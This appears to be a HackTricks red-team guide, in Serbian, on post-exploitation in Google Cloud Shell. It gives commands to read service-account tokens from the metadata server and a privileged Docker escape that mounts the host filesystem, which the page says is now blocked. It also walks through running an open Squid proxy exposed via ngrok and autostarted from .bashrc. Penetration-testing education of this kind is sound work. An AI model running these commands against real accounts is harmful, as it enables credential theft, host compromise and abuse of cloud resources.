GCP - Cloud Shell Post Exploitation

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Cloud Shell

Za više informacija o Cloud Shell pogledajte:

GCP - Cloud Shell Enum

Dobijanje korisničkog tokena iz metapodataka

Samo pristupanjem serveru metapodataka možete dobiti token koji omogućava pristup kao trenutno prijavljeni korisnik:

wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"

Container Escape / Docker use

Warning

Prethodno je cloud shell radio u kontejneru sa pristupom docker socket-u hosta. Sada je Google promenio arhitekturu i cloud shell kontejner radi u “Docker in a container” podešavanju. Dakle, čak i ako je moguće koristiti docker iz cloud shell-a, nećete moći da pobegnete na host koristeći docker socket. Imajte na umu da je prethodno fajl docker.sock bio lociran u /google/host/var/run/docker.sock, ali je sada premešten u /run/docker.sock.

Docker use / Old container escape commands ```bash sudo docker -H unix:///run/docker.sock pull alpine:latest sudo docker -H unix:///run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest sudo docker -H unix:///run/docker.sock start escaper sudo docker -H unix:///run/docker.sock exec -it escaper /bin/sh ```

Štaviše, ranije je bilo moguće pronaći token za servisni nalog koji koristi cloud shell VM u metadata serveru:

Stari servisni nalog iz metadata servera ```bash wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/" default/ vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/ ``` Sa sledećim opsegima: ```bash wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"

https://www.googleapis.com/auth/devstorage.read_only https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/monitoring.write

</details>

### Koristite ga kao proxy

Ako želite da koristite vašu google cloud shell instancu kao proxy, morate da pokrenete sledeće komande (ili ih ubacite u .bashrc fajl):

<details>

<summary>Instaliraj Squid proxy</summary>
```bash
sudo apt install -y squid

Samo da znaš, Squid je HTTP proxy server. Napravi fajl squid.conf sa sledećim podešavanjima:

Create squid.conf file ```bash http_port 3128 cache_dir /var/cache/squid 100 16 256 acl all src 0.0.0.0/0 http_access allow all ```

kopiraj fajl squid.conf u /etc/squid

Kopiraj konfiguraciju u **/etc/squid** ```bash sudo cp squid.conf /etc/squid ```

Na kraju pokrenite Squid servis:

Pokrenite Squid servis ```bash sudo service squid start ```

Koristite ngrok da bi proxy bio dostupan izvan mreže:

Izložite proxy pomoću ngrok ```bash ./ngrok tcp 3128 ```

Nakon pokretanja kopirajte tcp:// URL. Ako želite da pokrenete proxy iz pregledača, preporučuje se da uklonite tcp:// deo i port, i upišete port u polje za port u podešavanjima proxy-ja vašeg pregledača (squid je http proxy server).

Za bolje korišćenje pri pokretanju, fajl .bashrc treba da sadrži sledeće linije:

Dodajte u .bashrc za automatsko pokretanje ```bash sudo apt install -y squid sudo cp squid.conf /etc/squid/ sudo service squid start cd ngrok;./ngrok tcp 3128 ```

Instrukcije su kopirane sa https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key. Proverite tu stranicu za druge lude ideje kako pokrenuti bilo koji softver (baze podataka pa čak i Windows) u Cloud Shell.

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks